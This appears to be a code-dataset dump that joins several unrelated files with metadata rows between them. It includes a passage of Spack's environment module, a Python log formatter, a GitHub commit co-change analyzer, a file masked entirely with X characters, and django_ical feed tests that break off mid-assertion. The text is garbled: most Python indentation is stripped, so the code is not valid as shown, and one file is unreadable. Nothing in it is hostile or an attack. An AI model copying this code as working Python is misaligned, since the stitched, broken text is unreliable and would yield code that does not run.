# a large amount of time due to repeatedly acquiring and releasing
        # locks; this does an initial check across all specs within a single
# DB read transaction to reduce time spent in this case.
uninstalled_specs = []
with spack.store.db.read_transaction():
for concretized_hash in self.concretized_order:
spec = self.specs_by_hash[concretized_hash]
if not spec.package.installed:
uninstalled_specs.append(spec)
for spec in uninstalled_specs:
# Parse cli arguments and construct a dictionary
# that will be passed to Package.do_install API
kwargs = dict()
if args:
spack.cmd.install.update_kwargs_from_args(args, kwargs)
self._install(spec, **kwargs)
def all_specs(self):
"""Return all specs, even those a user spec would shadow."""
all_specs = set()
for h in self.concretized_order:
all_specs.update(self.specs_by_hash[h].traverse())
return sorted(all_specs)
def all_hashes(self):
"""Return hashes of all specs.
Note these hashes exclude build dependencies."""
return list(set(s.dag_hash() for s in self.all_specs()))
def roots(self):
"""Specs explicitly requested by the user *in this environment*.
Yields both added and installed specs that have user specs in
`spack.yaml`.
"""
concretized = dict(self.concretized_specs())
for spec in self.user_specs:
concrete = concretized.get(spec)
yield concrete if concrete else spec
def added_specs(self):
"""Specs that are not yet installed.
Yields the user spec for non-concretized specs, and the concrete
spec for already concretized but not yet installed specs.
"""
# use a transaction to avoid overhead of repeated calls
# to `package.installed`
with spack.store.db.read_transaction():
concretized = dict(self.concretized_specs())
for spec in self.user_specs:
concrete = concretized.get(spec)
if not concrete:
yield spec
elif not concrete.package.installed:
yield concrete
def concretized_specs(self):
"""Tuples of (user spec, concrete spec) for all concrete specs."""
for s, h in zip(self.concretized_user_specs, self.concretized_order):
yield (s, self.specs_by_hash[h])
def removed_specs(self):
"""Tuples of (user spec, concrete spec) for all specs that will be
        removed on next concretize."""
needed = set()
for s, c in self.concretized_specs():
if s in self.user_specs:
for d in c.traverse():
needed.add(d)
for s, c in self.concretized_specs():
for d in c.traverse():
if d not in needed:
yield d
def _get_environment_specs(self, recurse_dependencies=True):
"""Returns the specs of all the packages in an environment.
If these specs appear under different user_specs, only one copy
is added to the list returned.
"""
spec_list = list()
for spec_hash in self.concretized_order:
spec = self.specs_by_hash[spec_hash]
specs = (spec.traverse(deptype=('link', 'run'))
if recurse_dependencies else (spec,))
spec_list.extend(specs)
return spec_list
def _to_lockfile_dict(self):
"""Create a dictionary to store a lockfile for this environment."""
concrete_specs = {}
for spec in self.specs_by_hash.values():
for s in spec.traverse():
dag_hash_all = s.build_hash()
if dag_hash_all not in concrete_specs:
spec_dict = s.to_node_dict(hash=ht.build_hash)
spec_dict[s.name]['hash'] = s.dag_hash()
concrete_specs[dag_hash_all] = spec_dict
hash_spec_list = zip(
self.concretized_order, self.concretized_user_specs)
# this is the lockfile we'll write out
data = {
# metadata about the format
'_meta': {
'file-type': 'spack-lockfile',
'lockfile-version': lockfile_format_version,
},
# users specs + hashes are the 'roots' of the environment
'roots': [{
'hash': h,
'spec': str(s)
} for h, s in hash_spec_list],
# Concrete specs by hash, including dependencies
'concrete_specs': concrete_specs,
}
return data
def _read_lockfile(self, file_or_json):
"""Read a lockfile from a file or from a raw string."""
lockfile_dict = sjson.load(file_or_json)
self._read_lockfile_dict(lockfile_dict)
return lockfile_dict['_meta']['lockfile-version']
def _read_lockfile_dict(self, d):
"""Read a lockfile dictionary into this environment."""
roots = d['roots']
self.concretized_user_specs = [Spec(r['spec']) for r in roots]
self.concretized_order = [r['hash'] for r in roots]
json_specs_by_hash = d['concrete_specs']
root_hashes = set(self.concretized_order)
specs_by_hash = {}
for dag_hash, node_dict in json_specs_by_hash.items():
specs_by_hash[dag_hash] = Spec.from_node_dict(node_dict)
for dag_hash, node_dict in json_specs_by_hash.items():
for dep_name, dep_hash, deptypes in (
Spec.dependencies_from_node_dict(node_dict)):
specs_by_hash[dag_hash]._add_dependency(
specs_by_hash[dep_hash], deptypes)
# If we are reading an older lockfile format (which uses dag hashes
# that exclude build deps), we use this to convert the old
# concretized_order to the full hashes (preserving the order)
old_hash_to_new = {}
self.specs_by_hash = {}
for _, spec in specs_by_hash.items():
dag_hash = spec.dag_hash()
build_hash = spec.build_hash()
if dag_hash in root_hashes:
old_hash_to_new[dag_hash] = build_hash
if (dag_hash in root_hashes or build_hash in root_hashes):
self.specs_by_hash[build_hash] = spec
if old_hash_to_new:
# Replace any older hashes in concretized_order with hashes
# that include build deps
self.concretized_order = [
old_hash_to_new.get(h, h) for h in self.concretized_order]
def write(self, regenerate_views=True):
"""Writes an in-memory environment to its location on disk.
Write out package files for each newly concretized spec. Also
regenerate any views associated with the environment, if
regenerate_views is True.
Arguments:
regenerate_views (bool): regenerate views as well as
writing if True.
"""
        # Intercept environments not using the latest schema format and prevent
# them from being modified
manifest_exists = os.path.exists(self.manifest_path)
if manifest_exists and not is_latest_format(self.manifest_path):
msg = ('The environment "{0}" needs to be written to disk, but '
'is currently using a deprecated format. Please update it '
'using:\n\n'
'\tspack env update {0}\n\n'
'Note that previous versions of Spack will not be able to '
'use the updated configuration.')
raise RuntimeError(msg.format(self.name))
# ensure path in var/spack/environments
fs.mkdirp(self.path)
yaml_dict = config_dict(self.yaml)
raw_yaml_dict = config_dict(self.raw_yaml)
if self.specs_by_hash:
# ensure the prefix/.env directory exists
fs.mkdirp(self.env_subdir_path)
for spec in self.new_specs:
for dep in spec.traverse():
if not dep.concrete:
raise ValueError('specs passed to environment.write() '
'must be concrete!')
root = os.path.join(self.repos_path, dep.namespace)
repo = spack.repo.create_or_construct(root, dep.namespace)
pkg_dir = repo.dirname_for_package_name(dep.name)
fs.mkdirp(pkg_dir)
spack.repo.path.dump_provenance(dep, pkg_dir)
self.new_specs = []
# write the lock file last
with fs.write_tmp_and_move(self.lock_path) as f:
sjson.dump(self._to_lockfile_dict(), stream=f)
else:
if os.path.exists(self.lock_path):
os.unlink(self.lock_path)
# invalidate _repo cache
self._repo = None
# put any changes in the definitions in the YAML
for name, speclist in self.spec_lists.items():
if name == user_speclist_name:
# The primary list is handled differently
continue
active_yaml_lists = [x for x in yaml_dict.get('definitions', [])
if name in x and
_eval_conditional(x.get('when', 'True'))]
# Remove any specs in yaml that are not in internal representation
for ayl in active_yaml_lists:
# If it's not a string, it's a matrix. Those can't have changed
# If it is a string that starts with '$', it's a reference.
# Those also can't have changed.
ayl[name][:] = [s for s in ayl.setdefault(name, [])
if (not isinstance(s, six.string_types)) or
s.startswith('$') or Spec(s) in speclist.specs]
# Put the new specs into the first active list from the yaml
new_specs = [entry for entry in speclist.yaml_list
if isinstance(entry, six.string_types) and
not any(entry in ayl[name]
for ayl in active_yaml_lists)]
list_for_new_specs = active_yaml_lists[0].setdefault(name, [])
list_for_new_specs[:] = list_for_new_specs + new_specs
# put the new user specs in the YAML.
# This can be done directly because there can't be multiple definitions
# nor when clauses for `specs` list.
yaml_spec_list = yaml_dict.setdefault(user_speclist_name,
[])
yaml_spec_list[:] = self.user_specs.yaml_list
# Construct YAML representation of view
default_name = default_view_name
if self.views and len(self.views) == 1 and default_name in self.views:
path = self.default_view.root
if self.default_view == ViewDescriptor(self.path,
self.view_path_default):
view = True
elif self.default_view == ViewDescriptor(self.path, path):
view = path
else:
view = dict((name, view.to_dict())
for name, view in self.views.items())
elif self.views:
view = dict((name, view.to_dict())
for name, view in self.views.items())
else:
view = False
yaml_dict['view'] = view
# Remove yaml sections that are shadowing defaults
# construct garbage path to ensure we don't find a manifest by accident
with fs.temp_cwd() as env_dir:
bare_env = Environment(env_dir, with_view=self.view_path_default)
keys_present = list(yaml_dict.keys())
for key in keys_present:
if yaml_dict[key] == config_dict(bare_env.yaml).get(key, None):
if key not in raw_yaml_dict:
del yaml_dict[key]
# if all that worked, write out the manifest file at the top level
# (we used to check whether the yaml had changed and not write it out
        # if it hadn't. We can't do that anymore because the only thing that
        # changed could be the "override" attribute on a config dict,
        # which would not show up even in a string comparison between the two
# keys).
changed = not yaml_equivalent(self.yaml, self.raw_yaml)
written = os.path.exists(self.manifest_path)
if changed or not written:
self.raw_yaml = copy.deepcopy(self.yaml)
with fs.write_tmp_and_move(self.manifest_path) as f:
_write_yaml(self.yaml, f)
# TODO: rethink where this needs to happen along with
# writing. For some of the commands (like install, which write
# concrete specs AND regen) this might as well be a separate
        # call. But, having it here makes the views consistent with the
# concretized environment for most operations. Which is the
# special case?
if regenerate_views:
self.regenerate_views()
def __enter__(self):
self._previous_active = _active_environment
activate(self)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
deactivate()
if self._previous_active:
activate(self._previous_active)
def yaml_equivalent(first, second):
"""Returns whether two spack yaml items are equivalent, including overrides
"""
if isinstance(first, dict):
return isinstance(second, dict) and _equiv_dict(first, second)
elif isinstance(first, list):
return isinstance(second, list) and _equiv_list(first, second)
else: # it's a string
return isinstance(second, six.string_types) and first == second
def _equiv_list(first, second):
"""Returns whether two spack yaml lists are equivalent, including overrides
"""
if len(first) != len(second):
return False
return all(yaml_equivalent(f, s) for f, s in zip(first, second))
def _equiv_dict(first, second):
"""Returns whether two spack yaml dicts are equivalent, including overrides
"""
if len(first) != len(second):
return False
same_values = all(yaml_equivalent(fv, sv)
for fv, sv in zip(first.values(), second.values()))
same_keys_with_same_overrides = all(
fk == sk and getattr(fk, 'override', False) == getattr(sk, 'override',
False)
for fk, sk in zip(first.keys(), second.keys()))
return same_values and same_keys_with_same_overrides
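# Illustrative sketch (hypothetical data): for plain strings the comparison
# degenerates to ordinary equality, but syaml keys may carry an "override"
# flag, and a change in that flag alone makes two otherwise identical dicts
# non-equivalent, which is exactly why write() cannot rely on plain equality.
#
#     >>> yaml_equivalent({'config': {'install_tree': '$spack/opt'}},
#     ...                 {'config': {'install_tree': '$spack/opt'}})
#     True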
def display_specs(concretized_specs):
"""Displays the list of specs returned by `Environment.concretize()`.
Args:
concretized_specs (list): list of specs returned by
`Environment.concretize()`
"""
def _tree_to_display(spec):
return spec.tree(
recurse_dependencies=True,
status_fn=spack.spec.Spec.install_status,
hashlen=7, hashes=True)
for user_spec, concrete_spec in concretized_specs:
tty.msg('Concretized {0}'.format(user_spec))
sys.stdout.write(_tree_to_display(concrete_spec))
print('')
def _concretize_from_constraints(spec_constraints):
# Accept only valid constraints from list and concretize spec
# Get the named spec even if out of order
root_spec = [s for s in spec_constraints if s.name]
if len(root_spec) != 1:
m = 'The constraints %s are not a valid spec ' % spec_constraints
        m += 'concretization target. All specs must have a single name '
m += 'constraint for concretization.'
raise InvalidSpecConstraintError(m)
spec_constraints.remove(root_spec[0])
invalid_constraints = []
while True:
# Attach all anonymous constraints to one named spec
s = root_spec[0].copy()
for c in spec_constraints:
if c not in invalid_constraints:
s.constrain(c)
try:
return s.concretized()
except spack.spec.InvalidDependencyError as e:
invalid_deps_string = ['^' + d for d in e.invalid_deps]
invalid_deps = [c for c in spec_constraints
if any(c.satisfies(invd, strict=True)
for invd in invalid_deps_string)]
if len(invalid_deps) != len(invalid_deps_string):
raise e
invalid_constraints.extend(invalid_deps)
except UnknownVariantError as e:
invalid_variants = e.unknown_variants
inv_variant_constraints = [c for c in spec_constraints
if any(name in c.variants
for name in invalid_variants)]
if len(inv_variant_constraints) != len(invalid_variants):
raise e
invalid_constraints.extend(inv_variant_constraints)
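# Rough usage sketch (hypothetical specs): exactly one constraint must carry a
# package name; the anonymous ones are folded into it before concretizing.
#
#     >>> _concretize_from_constraints([Spec('zlib'), Spec('%gcc'), Spec('@1.2.11')])
#     # -> roughly Spec('[email protected]%gcc').concretized(), assuming both are valid here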
def make_repo_path(root):
"""Make a RepoPath from the repo subdirectories in an environment."""
path = spack.repo.RepoPath()
if os.path.isdir(root):
for repo_root in os.listdir(root):
repo_root = os.path.join(root, repo_root)
if not os.path.isdir(repo_root):
continue
repo = spack.repo.Repo(repo_root)
path.put_last(repo)
return path
def prepare_config_scope(env):
"""Add env's scope to the global configuration search path."""
for scope in env.config_scopes():
spack.config.config.push_scope(scope)
def deactivate_config_scope(env):
"""Remove any scopes from env from the global config path."""
for scope in env.config_scopes():
spack.config.config.remove_scope(scope.name)
def manifest_file(env_name_or_dir):
"""Return the absolute path to a manifest file given the environment
name or directory.
Args:
env_name_or_dir (str): either the name of a valid environment
or a directory where a manifest file resides
Raises:
AssertionError: if the environment is not found
"""
env_dir = None
if is_env_dir(env_name_or_dir):
env_dir = os.path.abspath(env_name_or_dir)
elif exists(env_name_or_dir):
env_dir = os.path.abspath(root(env_name_or_dir))
assert env_dir, "environment not found [env={0}]".format(env_name_or_dir)
return os.path.join(env_dir, manifest_name)
def update_yaml(manifest, backup_file):
"""Update a manifest file from an old format to the current one.
Args:
manifest (str): path to a manifest file
backup_file (str): file where to copy the original manifest
Returns:
True if the manifest was updated, False otherwise.
Raises:
AssertionError: in case anything goes wrong during the update
"""
# Check if the environment needs update
with open(manifest) as f:
data = syaml.load(f)
top_level_key = _top_level_key(data)
needs_update = spack.schema.env.update(data[top_level_key])
if not needs_update:
msg = "No update needed [manifest={0}]".format(manifest)
tty.debug(msg)
return False
# Copy environment to a backup file and update it
msg = ('backup file "{0}" already exists on disk. Check its content '
'and remove it before trying to update again.')
assert not os.path.exists(backup_file), msg.format(backup_file)
shutil.copy(manifest, backup_file)
with open(manifest, 'w') as f:
syaml.dump_config(data, f)
return True
def _top_level_key(data):
"""Return the top level key used in this environment
Args:
data (dict): raw yaml data of the environment
Returns:
Either 'spack' or 'env'
"""
msg = ('cannot find top level attribute "spack" or "env"'
'in the environment')
assert any(x in data for x in ('spack', 'env')), msg
if 'spack' in data:
return 'spack'
return 'env'
def is_latest_format(manifest):
"""Return True if the manifest file is at the latest schema format,
False otherwise.
Args:
manifest (str): manifest file to be analyzed
"""
with open(manifest) as f:
data = syaml.load(f)
top_level_key = _top_level_key(data)
changed = spack.schema.env.update(data[top_level_key])
return not changed
class SpackEnvironmentError(spack.error.SpackError):
"""Superclass for all errors to do with Spack environments."""
| lgpl-2.1 | -7,866,164,561,951,928,000 | 36.55805 | 79 | 0.589361 | false |
crowsonkb/style_transfer | log_utils.py | 1 | 3838 | import logging
import os
import sys
try:
import curses
except ImportError:
curses = None
def _stderr_supports_color():
color = False
if curses and hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():
try:
curses.setupterm()
if curses.tigetnum("colors") > 0:
color = True
except Exception:
pass
return color
class LogFormatter(logging.Formatter):
"""Log formatter originally from Tornado and modified."""
DEFAULT_FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s %(process)d]%(end_color)s %(message)s'
DEFAULT_DATE_FORMAT = '%y%m%d %H:%M:%S'
DEFAULT_COLORS = {
logging.DEBUG: 4, # Blue
logging.INFO: 2, # Green
logging.WARNING: 3, # Yellow
logging.ERROR: 1, # Red
}
def __init__(self, color=True, fmt=DEFAULT_FORMAT, datefmt=DEFAULT_DATE_FORMAT,
colors=DEFAULT_COLORS, precision=3):
r"""
:arg bool color: Enables color support.
:arg string fmt: Log message format.
It will be applied to the attributes dict of log records. The
text between ``%(color)s`` and ``%(end_color)s`` will be colored
depending on the level if color support is on.
:arg dict colors: color mappings from logging level to terminal color
code
:arg string datefmt: Datetime format.
          Used for formatting ``(asctime)`` placeholder in ``fmt``.
.. versionchanged:: 3.2
Added ``fmt`` and ``datefmt`` arguments.
"""
super().__init__()
self.default_time_format = datefmt
self.precision = precision
self.default_msec_format = ''
self._fmt = fmt
self._colors = {}
if color and _stderr_supports_color():
fg_color = (curses.tigetstr('setaf') or
curses.tigetstr('setf') or '')
for levelno, code in colors.items():
self._colors[levelno] = curses.tparm(fg_color, code).decode()
self._normal = curses.tigetstr('sgr0').decode()
else:
self._normal = ''
def format(self, record):
record.message = record.getMessage()
record.asctime = self.formatTime(record)
if record.levelno in self._colors:
record.color = self._colors[record.levelno]
record.end_color = self._normal
else:
record.color = record.end_color = ''
formatted = self._fmt % record.__dict__
if record.exc_info:
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
lines = [formatted.rstrip()]
lines.extend(ln for ln in record.exc_text.split('\n'))
formatted = '\n'.join(lines)
return formatted.replace('\n', '\n ')
def formatTime(self, record, datefmt=None):
if not datefmt:
datefmt = self.default_time_format
fmttime = super().formatTime(record, datefmt)
if self.precision >= 4:
return '%s.%06d' % (fmttime, record.msecs*1000)
if self.precision >= 1:
return '%s.%03d' % (fmttime, record.msecs)
return fmttime
def setup_logger(name=None, level=None, formatter_opts=None):
"""Sets up pretty logging using LogFormatter."""
if formatter_opts is None:
formatter_opts = {}
logging.captureWarnings(True)
logger = logging.getLogger(name)
if 'DEBUG' in os.environ:
level = logging.DEBUG
elif level is None:
level = logging.INFO
logger.setLevel(level)
channel = logging.StreamHandler()
formatter = LogFormatter(**formatter_opts)
channel.setFormatter(formatter)
logger.addHandler(channel)
return logger
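# Usage sketch (assumes this module is importable as log_utils): colors are
# applied only when stderr is a capable terminal, and a DEBUG environment
# variable overrides the requested level.
#
#     >>> logger = setup_logger('style_transfer', formatter_opts={'precision': 4})
#     >>> logger.info('starting transfer')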
| mit | 4,683,264,071,271,343,000 | 32.964602 | 99 | 0.585201 | false |
itu-oss-project-team/oss-github-analysis-project | github_analysis_tool/analyzer/commit_based_analyzer.py | 1 | 2535 | import collections
from github_analysis_tool.analyzer.abstract_analyzer import AbstractAnalyzer
from github_analysis_tool.services.db_column_constants import Columns
class CommitBasedAnalyzer(AbstractAnalyzer):
def __init__(self):
AbstractAnalyzer.__init__(self, "commit")
def create_matrix(self, repo_id):
        commit_matrix = collections.OrderedDict()  # {<commit1>: {<commit2>: <shared_file_changes>}}
commit_file_counts = collections.OrderedDict() # {<commit>:<file_count>}
repo_files = self._databaseService.get_files_of_repo(repo_id, get_only_file_paths=True)
# For every file in repo
for file_name in repo_files:
commits_of_file = self._databaseService.get_commits_of_file(repo_id, file_name, get_only_ids=True)
for commit in commits_of_file:
# Count how many files are there in each commit so we can normalize our matrix later with these counts
self.__increment_commit_file_count(commit_file_counts, commit)
for commit_1 in commits_of_file:
for commit_2 in commits_of_file:
# For every commit pair that edits this same file
self.__increment_file_count(commit_matrix, commit_1, commit_2)
self.__normalize_matrix(commit_matrix, commit_file_counts)
return commit_matrix
def __increment_file_count(self, commit_matrix, commit_1, commit_2):
if commit_1 == commit_2:
return
if commit_1 not in commit_matrix:
commit_matrix[commit_1] = {}
if commit_2 in commit_matrix[commit_1]:
commit_matrix[commit_1][commit_2] += 1
else:
commit_matrix[commit_1][commit_2] = 1
def __increment_commit_file_count(self, commit_file_counts, commit):
if commit not in commit_file_counts:
commit_file_counts[commit] = 1
else:
commit_file_counts[commit] += 1
def __normalize_matrix(self, commit_matrix, commit_file_counts):
for commit_1 in commit_matrix.keys():
for commit_2 in commit_matrix.keys():
if commit_2 not in commit_matrix[commit_1]:
continue
intersectCount = commit_matrix[commit_1][commit_2]
unionCount = commit_file_counts[commit_1] + commit_file_counts[commit_2] - intersectCount
                commit_matrix[commit_1][commit_2] = intersectCount / unionCount
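    # Normalization sketch (hypothetical counts): each pairwise count becomes a
    # Jaccard-style ratio of shared files over the union of files touched by
    # the two commits. For example, if commits A and B changed 3 and 4 files
    # with 2 in common, the matrix entry becomes 2 / (3 + 4 - 2) = 0.4.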
| mit | -7,743,140,120,545,697,000 | 43.473684 | 118 | 0.624852 | false |
dnaextrim/django_adminlte_x | adminlte/static/plugins/datatables/extensions/Responsive/examples/styling/index.html.py | 1 | 2421 | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXXX X XXXXXXXXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXXXXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXX XXXX XXXXXX XXXXXXX XXXXXXXXXXX XX XXX XXXX XXXX XXXXXXX XXXXXX XXXX XXX XXX XXXXX XXX XXXXXXX XXXX XXX XXXXX XXX XXXX XXXXXXXXXX XX XXXXX
XXXXXXXXXXX XXXXXXXXXX XXXX XXXX XXXXXXXXXXX XXXXXX XX XX XXXXXX XX XXXXXXXXX XXX XXXXXXXXXX XXX XXXX XXXXXXXXXXX XXXX XXXXXXX XXXXX XXXXXXXXXX XXXXX XXXXXXX XXXXX
XXXXXXXX XXX XXXXXXXXXXXXXXX
XXXXXX
XXXXXXXXXX
XXXXXX
XXXXXXXXX
XXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX XXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXX
XXXXXXXXX XXXXX XX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX XXX XXXX XXXXXXXXXXX XXXXX XXX XXX XXXXXXXXXX XXX XXXXXXXXXXXX
XXXXXXXXXXXXX XXXXX XXX X XXXX XXXXX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXX XXX XXXXXXXXXXXX XX XXXXXXXXXXXXXXX
XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX XXX XXXXXXX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX XXXXXX XXXXXXXXXXXXX
XXXXXXXXXX XX XXXXXXXX XXXXX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX
XXXXXX
XXXXXX
XXXXXXXXXX
XXXXXXX
XXXXXXX | mit | -5,425,496,570,000,140,000 | 41.491228 | 167 | 0.857497 | false |
Pinkerton/django-ical | django_ical/tests/test_feed.py | 1 | 15645 | from datetime import date
from datetime import datetime
from os import linesep
from django.test import TestCase
from django.test.client import RequestFactory
import icalendar
import pytz
from django_ical import utils
from django_ical.feedgenerator import ICal20Feed
from django_ical.views import ICalFeed
class TestICalFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Feed"
description = "Test ICal Feed"
items = []
class TestItemsFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Feed"
description = "Test ICal Feed"
def items(self):
return [
{
"title": "Title1",
"description": "Description1",
"link": "/event/1",
"start": datetime(2012, 5, 1, 18, 0),
"end": datetime(2012, 5, 1, 20, 0),
"recurrences": {
"rrules": [
utils.build_rrule(freq="DAILY", byhour=10),
utils.build_rrule(freq="MONTHLY", bymonthday=4),
],
"xrules": [
utils.build_rrule(freq="MONTHLY", bymonthday=-4),
utils.build_rrule(freq="MONTHLY", byday="+3TU"),
],
"rdates": [date(1999, 9, 2), date(1998, 1, 1)],
"xdates": [date(1999, 8, 1), date(1998, 2, 1)],
},
"geolocation": (37.386013, -122.082932),
"organizer": "[email protected]",
"participants": [
{
"email": "[email protected]",
"cn": "Joe Unresponsive",
"partstat": "NEEDS-ACTION",
},
{
"email": "[email protected]",
"cn": "Jane Attender",
"partstat": "ACCEPTED",
},
{
"email": "[email protected]",
"cn": "Dan Decliner",
"partstat": "DECLINED",
},
{
"email": "[email protected]",
"cn": "Mary Maybe",
"partstat": "TENTATIVE",
},
],
"modified": datetime(2012, 5, 2, 10, 0),
},
{
"title": "Title2",
"description": "Description2",
"link": "/event/2",
"start": datetime(2012, 5, 6, 18, 0),
"end": datetime(2012, 5, 6, 20, 0),
"recurrences": {
"rrules": [
utils.build_rrule(
freq="WEEKLY", byday=["MO", "TU", "WE", "TH", "FR"]
)
],
"xrules": [utils.build_rrule(freq="MONTHLY", byday="-3TU")],
"rdates": [date(1997, 9, 2)],
"xdates": [date(1997, 8, 1)],
},
"geolocation": (37.386013, -122.082932),
"modified": datetime(2012, 5, 7, 10, 0),
"organizer": {
"cn": "John Doe",
"email": "[email protected]",
"role": "CHAIR",
},
},
]
def item_title(self, obj):
return obj["title"]
def item_description(self, obj):
return obj["description"]
def item_start_datetime(self, obj):
return obj["start"]
def item_end_datetime(self, obj):
return obj["end"]
def item_rrule(self, obj):
return obj["recurrences"]["rrules"]
def item_exrule(self, obj):
return obj["recurrences"]["xrules"]
def item_rdate(self, obj):
return obj["recurrences"]["rdates"]
def item_exdate(self, obj):
return obj["recurrences"]["xdates"]
def item_link(self, obj):
return obj["link"]
def item_geolocation(self, obj):
return obj.get("geolocation", None)
def item_updateddate(self, obj):
return obj.get("modified", None)
def item_pubdate(self, obj):
return obj.get("modified", None)
def item_organizer(self, obj):
organizer_dic = obj.get("organizer", None)
if organizer_dic:
if isinstance(organizer_dic, dict):
organizer = icalendar.vCalAddress("MAILTO:%s" % organizer_dic["email"])
for key, val in organizer_dic.items():
                    if key != "email":
organizer.params[key] = icalendar.vText(val)
else:
organizer = icalendar.vCalAddress("MAILTO:%s" % organizer_dic)
return organizer
def item_attendee(self, obj):
""" All calendars support ATTENDEE attribute, however, at this time, Apple calendar (desktop & iOS) and Outlook
display event attendees, while Google does not. For SUBSCRIBED calendars it seems that it is not possible to
use the default method to respond. As an alternative, you may review adding custom links to your description
or setting up something like CalDav with authentication, which can enable the ability for attendees to respond
via the default icalendar protocol."""
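        # Example of the serialized property this produces for one attendee
        # (matching the expectations asserted in ICal20FeedTest below):
        #
        #     ATTENDEE;CN="Jane Attender";CUTYPE=INDIVIDUAL;PARTSTAT=ACCEPTED;ROLE=REQ-PARTICIPANT;RSVP=TRUE:MAILTO:[email protected]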
participants = obj.get("participants", None)
if participants:
attendee_list = list()
default_attendee_params = {
"cutype": icalendar.vText("INDIVIDUAL"),
"role": icalendar.vText("REQ-PARTICIPANT"),
"rsvp": icalendar.vText(
"TRUE"
), # Does not seem to work for subscribed calendars.
}
for participant in participants:
attendee = icalendar.vCalAddress("MAILTO:%s" % participant.pop("email"))
participant_dic = default_attendee_params.copy()
participant_dic.update(participant)
for key, val in participant_dic.items():
attendee.params[key] = icalendar.vText(val)
attendee_list.append(attendee)
return attendee_list
class TestFilenameFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Filename Feed"
description = "Test ICal Feed"
def get_object(self, request):
return {"id": 123}
def items(self, obj):
return [obj]
def file_name(self, obj):
return "%s.ics" % obj["id"]
def item_link(self, item):
return "" # Required by the syndication framework
class ICal20FeedTest(TestCase):
def test_basic(self):
request = RequestFactory().get("/test/ical")
view = TestICalFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(calendar["X-WR-CALNAME"], "Test Feed")
self.assertEquals(calendar["X-WR-CALDESC"], "Test ICal Feed")
def test_items(self):
request = RequestFactory().get("/test/ical")
view = TestItemsFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(len(calendar.subcomponents), 2)
self.assertEquals(calendar.subcomponents[0]["SUMMARY"], "Title1")
self.assertEquals(calendar.subcomponents[0]["DESCRIPTION"], "Description1")
self.assertTrue(calendar.subcomponents[0]["URL"].endswith("/event/1"))
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].to_ical(), b"20120501T180000"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].to_ical(), b"20120501T200000"
)
self.assertEquals(
calendar.subcomponents[0]["GEO"].to_ical(), "37.386013;-122.082932"
)
self.assertEquals(
calendar.subcomponents[0]["LAST-MODIFIED"].to_ical(), b"20120502T100000Z"
)
self.assertEquals(
calendar.subcomponents[0]["ORGANIZER"].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][0].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][0].params.to_ical(),
b'CN="Joe Unresponsive";CUTYPE=INDIVIDUAL;PARTSTAT=NEEDS-ACTION;ROLE=REQ-PARTICIPANT;'
b"RSVP=TRUE",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][1].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
